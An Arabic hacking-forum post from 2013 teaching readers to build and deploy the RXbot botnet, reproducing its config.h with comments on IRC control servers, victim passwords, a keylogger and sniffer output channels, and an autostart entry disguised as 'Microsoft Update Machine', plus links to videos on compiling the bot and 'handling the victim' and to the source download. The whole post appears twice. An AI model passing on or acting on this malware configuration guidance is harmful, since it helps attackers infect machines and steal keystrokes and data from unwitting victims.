lofe hak
04-11-2013, 07:02 AM
بسم الله الرحمن الرحيم
اليوم شرحنا عن بدء الاختراق بالبوت نت
و هانستخدم اليوم نوع من البوت نت مكتوب بلغة ال c++
و اسم البوت المستخدم هو RXbot و معروف باتزانة فى النظام
و له خواص سنتعرف عليها فى الشرح بازن الله
اول شىء لازم نعرف ان الملف الرئيسى لمشروع البوت نت يكون بامتداد .dsw يعنى هنا هنجده باسم Rbot.dsw
ثانى شىء لازم نعرفها انه بيتم التعديل على سورس البوت نت من ملف اسمه config.h
و تكون محتوياته كالتالى :
// bot configuration (Lsass by Uncanny)
int port = 6667; // بورت الاتصال المخصص لاستقبال الضحايا
int port2 = 6667; // بورت ثانوى يعنى لو ان الضحايا ما اتصلوش بالبورت الاول .. يتم الاتصال بالبورت الثانى
int socks4port = 38; // Port # for sock4 daemon to run on - CHANGE THIS!!!
int tftpport = 69; // Port # for tftp daemon to run on
int httpport = 81; // Port # for http daemon to run on
int rloginport = 37; // Port # for rlogin daemon to run on
BOOL topiccmd = TRUE; // set to TRUE to enable topic commands
BOOL rndfile**** = TRUE; // use random file ****
BOOL AutoStart = TRUE; // enable autostart registry keys
char prefix = '.'; // علامة لتميز البوت نت عن باقى زوار الغرفة
int maxrand = 6; // عدد الاحرف العشوائية الى يتكون منها اسم الضحية عند الوصول
int nicktype = CONSTNICK; // nick type (see rndnick.h)
BOOL nickprefix = TRUE; // nick uptime & mirc
قم بتغير الاعدادات للى تحبه
و هناك اعدادات السرفر كالتالى :
char botid[] = "Tr0gBot"; // bot id
char version[] = "[RxBot v7.6 modded by Tr0gd0r]"; // Bots !version reply
char password[] = "password"; // باسورد الدخول للضحية
char server[] = "no-ip"; // هنا تضع النو اى بى او السيرفر الخارجى
char serverpass[] = "server-password"; // هنا باسورد السرفر ان وجدت
char channel[] = "#channel"; // القناه الى هايدخل فيها الضحية
char server2[] = "no-ip2"; // سيرفر ثانوى يتصل بيه الضحية لو تعطل السرفر الاول
char channel2[] = "#channel2"; // القناه الثانوية
char chanpass2[] = ""; // باسورد القناة الثانوية
char file****[] = "winmgr*****"; // destination file ****
char keylogfile[] = "system.txt"; // keylog file****
char value****[] = "Microsoft Update Machine"; // value **** for autostart
char nickconst[] = "n-"; // first part to the bot's nick
char szLocalPayloadFile[]="msconfig.dat"; // Payload file****
char modeonconn[] = "-x+B"; // Can be more than one mode and contain both + and -
char exploitchan[] = "#channel"; // القناة المخصصة للاكسبلويت يعنى اى جهاز يتم اختراقه بالاكسلويت يص فيها
char keylogchan[] = "#channel"; // القناة المخصصة لعرض نتيجة الكى لوجر
char psniffchan[] = "#channel"; // القناة المخصصة لعرض نتيجة السنفر و متوافق مع win 98
و فى الشرح هانشوف طريقة التعديل و الترجمة
و بعد وصول التبليغ
شاهد الجزء الاول من هنا و هو تعديل الكونفج و ترجمة السورس و انتاج سيرفر بوت نت .
http://www.mediafire.com/?dojwj1njlrag393
و شاهد الجزء الثانى و هو التعامل مع الضحية بعد وصول التبليغ
كود PHP:
http://www.mediafire.com/?a9p53xpsc7497a8
و لتحميل السورس الخاص بالبوت نت rxbot7.0 من هنا
http://www.mediafire.com/download.php?2nwmht7imji6pfm
اليوم شرحنا عن بدء الاختراق بالبوت نت
و هانستخدم اليوم نوع من البوت نت مكتوب بلغة ال c++
و اسم البوت المستخدم هو RXbot و معروف باتزانة فى النظام
و له خواص سنتعرف عليها فى الشرح بازن الله
اول شىء لازم نعرف ان الملف الرئيسى لمشروع البوت نت يكون بامتداد .dsw يعنى هنا هنجده باسم Rbot.dsw
ثانى شىء لازم نعرفها انه بيتم التعديل على سورس البوت نت من ملف اسمه config.h
و تكون محتوياته كالتالى :
// bot configuration (Lsass by Uncanny)
int port = 6667; // بورت الاتصال المخصص لاستقبال الضحايا
int port2 = 6667; // بورت ثانوى يعنى لو ان الضحايا ما اتصلوش بالبورت الاول .. يتم الاتصال بالبورت الثانى
int socks4port = 38; // Port # for sock4 daemon to run on - CHANGE THIS!!!
int tftpport = 69; // Port # for tftp daemon to run on
int httpport = 81; // Port # for http daemon to run on
int rloginport = 37; // Port # for rlogin daemon to run on
BOOL topiccmd = TRUE; // set to TRUE to enable topic commands
BOOL rndfile**** = TRUE; // use random file ****
BOOL AutoStart = TRUE; // enable autostart registry keys
char prefix = '.'; // علامة لتميز البوت نت عن باقى زوار الغرفة
int maxrand = 6; // عدد الاحرف العشوائية الى يتكون منها اسم الضحية عند الوصول
int nicktype = CONSTNICK; // nick type (see rndnick.h)
BOOL nickprefix = TRUE; // nick uptime & mirc
قم بتغير الاعدادات للى تحبه
و هناك اعدادات السرفر كالتالى :
char botid[] = "Tr0gBot"; // bot id
char version[] = "[RxBot v7.6 modded by Tr0gd0r]"; // Bots !version reply
char password[] = "password"; // باسورد الدخول للضحية
char server[] = "no-ip"; // هنا تضع النو اى بى او السيرفر الخارجى
char serverpass[] = "server-password"; // هنا باسورد السرفر ان وجدت
char channel[] = "#channel"; // القناه الى هايدخل فيها الضحية
char server2[] = "no-ip2"; // سيرفر ثانوى يتصل بيه الضحية لو تعطل السرفر الاول
char channel2[] = "#channel2"; // القناه الثانوية
char chanpass2[] = ""; // باسورد القناة الثانوية
char file****[] = "winmgr*****"; // destination file ****
char keylogfile[] = "system.txt"; // keylog file****
char value****[] = "Microsoft Update Machine"; // value **** for autostart
char nickconst[] = "n-"; // first part to the bot's nick
char szLocalPayloadFile[]="msconfig.dat"; // Payload file****
char modeonconn[] = "-x+B"; // Can be more than one mode and contain both + and -
char exploitchan[] = "#channel"; // القناة المخصصة للاكسبلويت يعنى اى جهاز يتم اختراقه بالاكسلويت يص فيها
char keylogchan[] = "#channel"; // القناة المخصصة لعرض نتيجة الكى لوجر
char psniffchan[] = "#channel"; // القناة المخصصة لعرض نتيجة السنفر و متوافق مع win 98
و فى الشرح هانشوف طريقة التعديل و الترجمة
و بعد وصول التبليغ
شاهد الجزء الاول من هنا و هو تعديل الكونفج و ترجمة السورس و انتاج سيرفر بوت نت .
http://www.mediafire.com/?dojwj1njlrag393
و شاهد الجزء الثانى و هو التعامل مع الضحية بعد وصول التبليغ
كود PHP:
http://www.mediafire.com/?a9p53xpsc7497a8
و لتحميل السورس الخاص بالبوت نت rxbot7.0 من هنا
http://www.mediafire.com/download.php?2nwmht7imji6pfm